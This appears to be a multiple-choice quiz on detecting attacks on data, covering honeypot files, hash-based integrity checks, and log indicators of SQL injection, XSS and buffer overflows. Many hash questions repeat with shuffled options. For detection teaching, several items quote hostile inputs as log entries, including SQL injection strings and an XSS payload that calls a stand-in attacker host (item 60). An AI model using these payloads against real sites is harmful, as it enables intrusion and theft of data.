Multiple Choice
Identify the
choice that best completes the statement or answers the question.
|
|
|
1.
|
(1 point) What is the
PRIMARY purpose of a honeypot file in data-security monitoring?
a. | To speed up file transfers across the
network. | b. | To trigger an alert if someone accesses the file,
because there is no legitimate reason to use it. | c. | To replace encryption for all sensitive files. | d. | To store real customer credit card numbers in an easy-to-find
location. |
|
|
|
2.
|
(1 point) Why is access
to a honeypot usually considered an indicator of compromise (IoC)?
a. | Honeypots are used only to increase storage
capacity. | b. | The file is fake and should not be accessed during
normal work, so access suggests malicious intent. | c. | Any file access is always malicious. | d. | Honeypots prevent all attacks
automatically. |
|
|
|
3.
|
(1 point) Which
honeypot design is MOST likely to attract a data thief?
a. | A folder named 'Public_Forms' with blank
templates | b. | A file named 'ReadMe.txt' explaining office
hours | c. | A file named 'Payroll_2026_CreditCards.xlsx'
filled with fake data | d. | A file named
'Printer_Drivers' containing device manuals |
|
|
|
4.
|
(1 point) An alert
shows someone opened a honeypot file labeled 'PII_Backup'. What is the BEST next
step?
a. | Investigate the account and device involved and review
related access logs for other suspicious actions. | b. | Assume it was a mistake and take no action. | c. | Immediately delete all organization files to stop the
attacker. | d. | Ignore it because the data in the file is
fake. |
|
|
|
5.
|
(1 point) Which
statement BEST explains why honeypots help detection?
a. | They stop buffer overflows by adding extra memory
segments. | b. | They make encryption unnecessary for sensitive
files. | c. | They provide a high-signal alert because legitimate
users have no business need to access them. | d. | They guarantee
attackers will reveal their real identities. |
|
|
|
6.
|
(1 point) What is a key
limitation of relying ONLY on honeypots for detecting attacks on data?
a. | An attacker might steal real data without touching the
honeypot, so other monitoring is still needed. | b. | Honeypots prevent
all attacks, so no limitation exists. | c. | Honeypots can only
detect natural disasters. | d. | Honeypots
automatically decrypt encrypted drives. |
|
|
|
7.
|
(1 point) How can a
cryptographic hash help detect whether a file was altered?
a. | The hash prevents anyone from opening the
file. | b. | The hash guarantees the file is stored in a secure
location. | c. | If the file changes, the hash digest will change,
showing the content is different. | d. | The hash converts
ciphertext back into plaintext automatically. |
|
|
|
8.
|
(1 point) An
organization stores a known-good hash for a configuration file. Today's hash does not match.
What is the MOST reasonable conclusion?
a. | The file's contents changed and could indicate
unauthorized modification. | b. | The network
firewall rules are in the wrong order. | c. | The user's
password policy is too strict. | d. | The file must be
encrypted with a stronger key length. |
|
|
|
9.
|
(1 point) Which
scenario BEST fits using hashes to detect attacks on data?
a. | Blocking port 80 on an ACL | b. | Using a password manager to create long passwords | c. | Placing a camera at a building entrance | d. | Comparing a file's current digest to a baseline digest to check for
unexpected changes |
|
|
|
10.
|
(1 point) Why might an
unexpected file hash change be suspicious even if the file name is the same?
a. | An attacker can modify the contents without changing the
file name, and the hash would reveal the change. | b. | Hashes show the user's location and device
type. | c. | Hashes only change when the file is moved to a new
folder. | d. | Hashes only apply to encrypted data and not normal
files. |
|
|
|
11.
|
(1 point) Which
statement about hashes is MOST accurate in the context of detection?
a. | Hashes are the same as passwords and can be reversed to
reveal the original file. | b. | Hashes are mainly
used to increase download speeds. | c. | Hashes prove who
accessed a file and at what time. | d. | Hashes help detect
integrity problems by showing when data has changed
unexpectedly. |
|
|
|
12.
|
(1 point) If a
file's hash matches a known-good digest, what does that BEST suggest?
a. | The file is encrypted with an asymmetric
key. | b. | The file is definitely free of all malware and
risk. | c. | The file's contents match the known-good version at
the time of comparison. | d. | The file was never
accessed by anyone. |
|
|
|
13.
|
(1 point) Which
approach BEST combines multiple detection ideas from this topic?
a. | Review access logs for unusual patterns, use honeypot
alerts, and verify critical file hashes. | b. | Only disable USB
ports and stop monitoring. | c. | Only use a
honeypot and ignore all other logs. | d. | Only require
password changes every 30 days. |
|
|
|
14.
|
(1 point) A user
account shows many failed attempts to access a sensitive folder, then a successful access and a copy
action. Which evidence would BEST help confirm this is malicious?
a. | Whether the user printed a document last
week | b. | The employee's favorite
browser | c. | The color theme of the operating
system | d. | Correlating the access logs with device/location info
and checking if any honeypot files were accessed |
|
|
|
15.
|
(1 point) What makes
access logs useful for detecting attempts to COPY or DELETE files?
a. | They replace the need for encryption and access
control. | b. | They record actions taken on data, allowing defenders to
see suspicious operations, not just logins. | c. | They automatically
restore deleted files without backups. | d. | They block all
copy operations by default. |
|
|
|
16.
|
(1 point) Which event
would MOST likely trigger a high-confidence alert with minimal false positives?
a. | A scheduled system update that changes
timestamps | b. | A single login
during normal hours from a known device | c. | A user opening a
file they use daily | d. | Access to a
well-designed honeypot file containing fake sensitive data |
|
|
|
17.
|
(1 point) Why should
defenders investigate 'abrupt, unusual spikes' in file access and transfer
logs?
a. | Spikes can indicate automated copying or exfiltration
attempts affecting many files quickly. | b. | Spikes always mean
the server is running faster than normal. | c. | Spikes are
required for encryption to work. | d. | Spikes prove the
data is safe because activity is visible. |
|
|
|
18.
|
(1 point) An attacker
modifies a sensitive policy document without permission. Which detection method from this topic is
MOST direct for spotting the change?
a. | Comparing the file's current hash digest to a
known-good digest | b. | Using a stateless
firewall to filter ports | c. | Changing the SSID
name | d. | Disabling beacon frames on
Wi-Fi |
|
|
|
19.
|
(1 point) Which
description BEST matches an indicator of compromise (IoC) for data attacks?
a. | Evidence in logs or files that suggests an adversary
accessed, copied, deleted, or altered data. | b. | A password that
includes special characters. | c. | A network cable
labeled with the correct VLAN. | d. | A company slogan
reminding users to be careful. |
|
|
|
20.
|
(1 point) A file's
SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best
conclusion? (Question 1)
a. | The file likely has not been altered between the two
checks. | b. | The file was encrypted
overnight. | c. | The file is
definitely malware-free. | d. | The hash function
is broken. |
|
|
|
21.
|
(1 point) Why can
hashes help detect whether a file was changed? (Question 2)
a. | Hash functions are repeatable: the same input produces
the same output. | b. | Hash functions
always encrypt files. | c. | Hashes make files
smaller. | d. | Hashes remove viruses from
files. |
|
|
|
22.
|
(1 point) Which tool
could you use to calculate a file hash? (Question 3)
a. | A spreadsheet chart tool | c. | A printer driver | b. | A word
processor | d. | A command line utility like shasum |
|
|
|
23.
|
(1 point) On a Mac
using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question
4)
a. | shasum -a 256 testfile | c. | hash -s testfile 256 | b. | checksum /256
testfile | d. | sha256 -file testfile |
|
|
|
24.
|
(1 point) A security
team records the hash of a file. Later the file's hash is different. What does that indicate?
(Question 5)
a. | The file can no longer be
opened. | b. | The computer's clock
changed. | c. | The file is stored in a different
folder. | d. | The file was altered after the first hash was
recorded. |
|
|
|
25.
|
(1 point) A file's
SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best
conclusion? (Question 6)
a. | The hash function is broken. | b. | The file is definitely malware-free. | c. | The file was encrypted overnight. | d. | The file likely has not been altered between the two
checks. |
|
|
|
26.
|
(1 point) Why can
hashes help detect whether a file was changed? (Question 7)
a. | Hashes make files smaller. | b. | Hash functions always encrypt files. | c. | Hashes remove viruses from files. | d. | Hash functions are repeatable: the same input produces the same
output. |
|
|
|
27.
|
(1 point) Which tool
could you use to calculate a file hash? (Question 8)
a. | A word processor | c. | A
command line utility like shasum | b. | A spreadsheet
chart tool | d. | A printer driver |
|
|
|
28.
|
(1 point) On a Mac
using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question
9)
a. | checksum /256 testfile | c. | hash -s testfile 256 | b. | sha256 -file
testfile | d. | shasum -a 256 testfile |
|
|
|
29.
|
(1 point) A security
team records the hash of a file. Later the file's hash is different. What does that indicate?
(Question 10)
a. | The file can no longer be
opened. | b. | The file was altered after the first hash was
recorded. | c. | The computer's clock
changed. | d. | The file is stored in a different
folder. |
|
|
|
30.
|
(1 point) A file's
SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best
conclusion? (Question 11)
a. | The file is definitely
malware-free. | b. | The file was
encrypted overnight. | c. | The file likely
has not been altered between the two checks. | d. | The hash function
is broken. |
|
|
|
31.
|
(1 point) Why can
hashes help detect whether a file was changed? (Question 12)
a. | Hash functions are repeatable: the same input produces
the same output. | b. | Hash functions
always encrypt files. | c. | Hashes make files
smaller. | d. | Hashes remove viruses from
files. |
|
|
|
32.
|
(1 point) Which tool
could you use to calculate a file hash? (Question 13)
a. | A printer driver | c. | A word
processor | b. | A command line utility like
shasum | d. | A spreadsheet chart tool |
|
|
|
33.
|
(1 point) On a Mac
using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question
14)
a. | shasum -a 256 testfile | c. | hash -s testfile 256 | b. | checksum /256
testfile | d. | sha256 -file testfile |
|
|
|
34.
|
(1 point) A security
team records the hash of a file. Later the file's hash is different. What does that indicate?
(Question 15)
a. | The file was altered after the first hash was
recorded. | b. | The file is stored in a different
folder. | c. | The file can no longer be
opened. | d. | The computer's clock
changed. |
|
|
|
35.
|
(1 point) A file's
SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best
conclusion? (Question 16)
a. | The file is definitely
malware-free. | b. | The file likely
has not been altered between the two checks. | c. | The hash function
is broken. | d. | The file was
encrypted overnight. |
|
|
|
36.
|
(1 point) Why can
hashes help detect whether a file was changed? (Question 17)
a. | Hash functions are repeatable: the same input produces
the same output. | b. | Hashes make files
smaller. | c. | Hashes remove viruses from
files. | d. | Hash functions always encrypt
files. |
|
|
|
37.
|
(1 point) Which tool
could you use to calculate a file hash? (Question 18)
a. | A spreadsheet chart tool | c. | A command line utility like shasum | b. | A printer driver | d. | A word
processor |
|
|
|
38.
|
(1 point) On a Mac
using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question
19)
a. | sha256 -file testfile | c. | hash -s testfile 256 | b. | shasum -a 256
testfile | d. | checksum /256 testfile |
|
|
|
39.
|
(1 point) A security
team records the hash of a file. Later the file's hash is different. What does that indicate?
(Question 20)
a. | The file was altered after the first hash was
recorded. | b. | The file can no longer be
opened. | c. | The file is stored in a different
folder. | d. | The computer's clock
changed. |
|
|
|
40.
|
(1 point) A file's
SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best
conclusion? (Question 21)
a. | The hash function is broken. | b. | The file is definitely malware-free. | c. | The file likely has not been altered between the two
checks. | d. | The file was encrypted
overnight. |
|
|
|
41.
|
(1 point) Why can
hashes help detect whether a file was changed? (Question 22)
a. | Hashes remove viruses from
files. | b. | Hash functions always encrypt
files. | c. | Hashes make files smaller. | d. | Hash functions are repeatable: the same input produces the same
output. |
|
|
|
42.
|
(1 point) Which tool
could you use to calculate a file hash? (Question 23)
a. | A printer driver | c. | A
command line utility like shasum | b. | A spreadsheet
chart tool | d. | A word processor |
|
|
|
43.
|
(1 point) On a Mac
using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question
24)
a. | sha256 -file testfile | c. | checksum /256 testfile | b. | shasum -a 256
testfile | d. | hash -s testfile 256 |
|
|
|
44.
|
(1 point) A security
team records the hash of a file. Later the file's hash is different. What does that indicate?
(Question 25)
a. | The file was altered after the first hash was
recorded. | b. | The file is stored in a different
folder. | c. | The file can no longer be
opened. | d. | The computer's clock
changed. |
|
|
|
45.
|
(1 point) A file's
SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best
conclusion? (Question 26)
a. | The file likely has not been altered between the two
checks. | b. | The hash function is broken. | c. | The file was encrypted overnight. | d. | The file is definitely malware-free. |
|
|
|
46.
|
(1 point) Why can
hashes help detect whether a file was changed? (Question 27)
a. | Hash functions are repeatable: the same input produces
the same output. | b. | Hashes remove
viruses from files. | c. | Hashes make files
smaller. | d. | Hash functions always encrypt
files. |
|
|
|
47.
|
(1 point) Which tool
could you use to calculate a file hash? (Question 28)
a. | A spreadsheet chart tool | c. | A word processor | b. | A command line
utility like shasum | d. | A printer driver |
|
|
|
48.
|
(1 point) On a Mac
using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question
29)
a. | hash -s testfile 256 | c. | shasum -a 256 testfile | b. | checksum /256
testfile | d. | sha256 -file testfile |
|
|
|
49.
|
(1 point) A security
team records the hash of a file. Later the file's hash is different. What does that indicate?
(Question 30)
a. | The file is stored in a different
folder. | b. | The file can no longer be
opened. | c. | The computer's clock
changed. | d. | The file was altered after the first hash was
recorded. |
|
|
|
50.
|
(1 point) A web app log
shows the input: username=admin' OR 1=1 --. Which application attack does this most strongly
indicate?
a. | Buffer overflow | c. | SQL
injection | b. | Credential stuffing | d. | Cross-site
scripting (XSS) |
|
|
|
51.
|
(1 point) In an
application log, you see many requests containing the keyword FROM in all caps inside a search box.
What is the most likely reason this is suspicious?
a. | It proves the database is
corrupted | b. | It may indicate an attempted SQL injection using SQL
control words | c. | It confirms an XSS
attack is successful | d. | It shows the user
is uploading malware |
|
|
|
52.
|
(1 point) Which log
entry is the clearest indicator of an attempted SQL injection?
a. | login failed for user jdoe | c. | cookie=AAAAAA... (very long string) | b. | q=<script>alert(1)</script> | d. | q=books'
WHERE 1=1 -- |
|
|
|
53.
|
(1 point) A security
analyst is reviewing user input and flags 'OR 1=1'. Why is this pattern commonly used by
attackers?
a. | It reduces the size of the request to avoid
detection | b. | It can turn a condition into 'true' to bypass
checks and return extra data | c. | It encrypts the
query to hide it from logs | d. | It forces the
server to reboot |
|
|
|
54.
|
(1 point) A web server
log contains: id=12; DROP TABLE USERS. What is the best next step for detecting whether this was an
SQL injection attempt?
a. | Review application/server logs for SQL control words and
symbols like WHERE, FROM, and comment markers | b. | Reimage the
database server immediately without collecting evidence | c. | Only check firewall logs for blocked IPs | d. | Ignore it because semicolons are normal in
URLs |
|
|
|
55.
|
(1 point) Which symbol
in user input is specifically noted as suspicious for SQL injection because it starts a comment in
SQL?
a. | #!/bin/bash | c. | <script> | b. | %PDF | d. | Double dash: -- |
|
|
|
56.
|
(1 point) An app's
error log repeatedly shows 'syntax error near WHERE' after users submit a form. What does
this most likely suggest?
a. | The site is experiencing a DDoS
attack | b. | User input may be altering SQL queries (possible SQL
injection attempts) | c. | The SSL
certificate expired | d. | A buffer overflow
crashed the browser |
|
|
|
57.
|
(1 point) You see the
following query parameter in logs: search=abc' IN (SELECT * FROM customers) --. Which category
of indicator is this?
a. | Normal user behavior | b. | Suspicious HTML tags in user input | c. | SQL control words and comment markers in user input | d. | Unusually long cookie length |
|
|
|
58.
|
(1 point) A SIEM alert
highlights many requests with 'OR 1=1' from the same IP. What is the best
interpretation?
a. | A successful XSS attack is stealing
cookies | b. | A buffer overflow is corrupting
memory | c. | An attacker is jamming WiFi | d. | Repeated SQL injection attempts are likely coming from that
source |
|
|
|
59.
|
(1 point) Which log
field is MOST relevant to check for SQL injection indicators listed in the EK (e.g., WHERE, FROM,
--)?
a. | Wireless signal strength logs | b. | CPU temperature logs | c. | User input
captured in application or server logs | d. | Printer spooler
logs |
|
|
|
60.
|
(1 point) A comment
field entry appears in logs as:
<script>fetch('http://evil.site/steal')</script>. Which attack does this
suggest?
a. | Cross-site scripting (XSS) | c. | Buffer overflow | b. | SQL
injection | d. | MAC flooding |
|
|
|
61.
|
(1 point) Why is the
<script></script> tag suspicious in user input for a web application?
a. | It only affects server-side memory
buffers | b. | It automatically encrypts the user's
data | c. | It can cause the browser to run attacker-controlled
code | d. | It forces the database to delete
tables |
|
|
|
62.
|
(1 point) Which input
is the best example of an XSS indicator in logs?
a. | OR 1=1 -- | c. | WHERE
id=5 | b. | cookie length = 4096 bytes | d. | <script>alert('hi')</script> |
|
|
|
63.
|
(1 point) A web app log
shows user input: <ScRiPt>location.href='http://fake'</ScRiPt>. How should a
defender treat this entry?
a. | As normal HTML formatting | b. | As a harmless SQL comment | c. | As proof of a buffer overflow | d. | As suspicious for XSS, since attackers may vary capitalization to bypass
simple filters |
|
|
|
64.
|
(1 point) An analyst is
searching logs for XSS. What is the most direct search term from the EK to start with?
a. | 255.255.255.0 | c. | DROP | b. | SYN-ACK | d. | <script> |
|
|
|
65.
|
(1 point) A forum post
contains: <script>document.cookie</script>. What data is the attacker most likely trying
to access?
a. | Browser-stored session information such as
cookies | b. | The router's routing
table | c. | The operating system kernel | d. | The switch CAM table |
|
|
|
66.
|
(1 point) A company
sees multiple requests that include '<script>' in a profile bio field. What is a
reasonable conclusion?
a. | The system clock is
unsynchronized | b. | Users may be
attempting to inject scripts (possible XSS attempts) | c. | The database is automatically backing up | d. | The firewall is dropping private IP
traffic |
|
|
|
67.
|
(1 point) Which log
review action is most helpful for confirming XSS attempts?
a. | Replace all Ethernet cables | b. | Check only the ARP table on the gateway | c. | Run tracert to the site | d. | Check user input
fields for suspicious HTML tags, especially
<script></script> |
|
|
|
68.
|
(1 point) An attacker
inserts script code into a site's comment field so that any visitor runs it. If you only had
logs, what indicator would you look for?
a. | Suspicious tags like <script> in stored user
input | b. | A long URL, cookie, or query string
only | c. | A burst of frames with many MAC
addresses | d. | A 'permission denied' error on
chmod |
|
|
|
69.
|
(1 point) A WAF report
shows it blocked a request due to 'XSS Detected' and the payload contained <script>.
What does this suggest about the request?
a. | It was a WPA3 encryption
failure | b. | It was a DNS poisoning
attempt | c. | It was a normal login attempt | d. | It likely contained script injection content typical of XSS
attempts |
|
|
|
70.
|
(1 point) Which web
request characteristic is MOST likely to indicate an attempted buffer overflow, according to the
EK?
a. | Presence of WHERE and FROM
keywords | b. | Repeated login failures for one
user | c. | Presence of <script>
tags | d. | Unusually long URL length, cookie length, query string
length, or total request length |
|
|
|
71.
|
(1 point) A log shows a
request with a query string of 20,000 characters. What is the best interpretation?
a. | Possible buffer overflow attempt due to unusually long
input | b. | Normal behavior for all
browsers | c. | Clear evidence of SQL
injection | d. | A sign of MAC
spoofing |
|
|
|
72.
|
(1 point) A security
analyst is checking for buffer overflow attempts on a web app. Which fields should they
review?
a. | ARP cache entries and MAC
addresses | b. | Subnet masks and routing
metrics | c. | URL length, cookie length, query string length, and
total request length | d. | BIOS password
settings |
|
|
|
73.
|
(1 point) A cookie
value in logs is extremely long and repeats 'A' thousands of times. Why might this be
suspicious?
a. | It always means the user is
authenticated | b. | It proves the
server is encrypted with AES | c. | Attackers may send
long strings to overflow buffers in web applications | d. | It indicates a phishing email was
opened |
|
|
|
74.
|
(1 point) You see
normal user input, but the total request length spikes to 50 KB repeatedly from one IP. What might
this indicate?
a. | A DHCP lease renewal | b. | A normal NTP time sync | c. | An attempted
buffer overflow attack using oversized requests | d. | A successful
password reset |
|
|
|
75.
|
(1 point) Which
log-based indicator best differentiates a buffer overflow attempt from an SQL injection
attempt?
a. | A SYN flag in TCP | b. | Use of a VPN | c. | Very long request
fields (URL/cookies/query strings) rather than SQL control words like WHERE or OR
1=1 | d. | Presence of port 443
traffic |
|
|
|
76.
|
(1 point) A web server
log shows: URL length=18000, cookie length=12000, query length=500. What should a defender do
next?
a. | Only check for SQL keywords in the
request | b. | Flag it as suspicious for a buffer overflow attempt and
investigate the source and payload | c. | Treat it as DNS
poisoning | d. | Assume it is safe because cookies can be
long |
|
|
|
77.
|
(1 point) Why can
checking request length help detect buffer overflow attempts?
a. | Long requests automatically encrypt
data | b. | XSS attacks only happen in
cookies | c. | Buffer overflow attempts often involve sending more data
than the application expects in fixed-size memory buffers | d. | SQL injection attacks always require long
URLs |
|
|
|
78.
|
(1 point) A security
team wants to reduce false alarms when looking for buffer overflows. What is a good rule based on the
EK?
a. | Alert whenever a user logs in after 5
PM | b. | Alert whenever the word FROM
appears | c. | Alert whenever any script tag appears in HTML
output | d. | Alert when URL/cookie/query string/total request lengths
are unusually large compared to typical requests |
|
|
|
79.
|
(1 point) Which
situation is the strongest indicator of a buffer overflow attempt in web logs?
a. | A request contains
<script>alert(1)</script> | b. | A request contains
OR 1=1 -- | c. | A single request includes an extremely long query string
and total request size far above normal | d. | A user mistypes
their password twice |
|